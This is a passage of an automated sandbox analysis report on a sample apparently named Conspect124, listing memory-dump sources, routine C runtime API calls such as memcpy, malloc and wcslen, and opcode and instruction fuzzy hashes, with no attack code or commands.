                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@$memset
                                      • String ID:
                                      • API String ID: 1860491036-0
                                      • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                      • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                      APIs
                                      • wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                      • free.MSVCRT ref: 0040A908
                                      • free.MSVCRT ref: 0040A92B
                                      • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free$memcpy$mallocwcslen
                                      • String ID:
                                      • API String ID: 726966127-0
                                      • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                      • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                      APIs
                                      • wcslen.MSVCRT ref: 0040B1DE
                                      • free.MSVCRT ref: 0040B201
                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                      • free.MSVCRT ref: 0040B224
                                      • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free$memcpy$mallocwcslen
                                      • String ID:
                                      • API String ID: 726966127-0
                                      • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                      • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                      APIs
                                      • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                        • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                      • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                      • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcmp$memcpy
                                      • String ID:
                                      • API String ID: 231171946-0
                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                      APIs
                                      • strlen.MSVCRT ref: 0040B0D8
                                      • free.MSVCRT ref: 0040B0FB
                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                      • free.MSVCRT ref: 0040B12C
                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free$memcpy$mallocstrlen
                                      • String ID:
                                      • API String ID: 3669619086-0
                                      • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                      • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                      • malloc.MSVCRT ref: 00417407
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                      • free.MSVCRT ref: 00417425
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$freemalloc
                                      • String ID:
                                      • API String ID: 2605342592-0
                                      • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                      • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcslen$wcscat$wcscpy
                                      • String ID:
                                      • API String ID: 1961120804-0
                                      • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                      • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E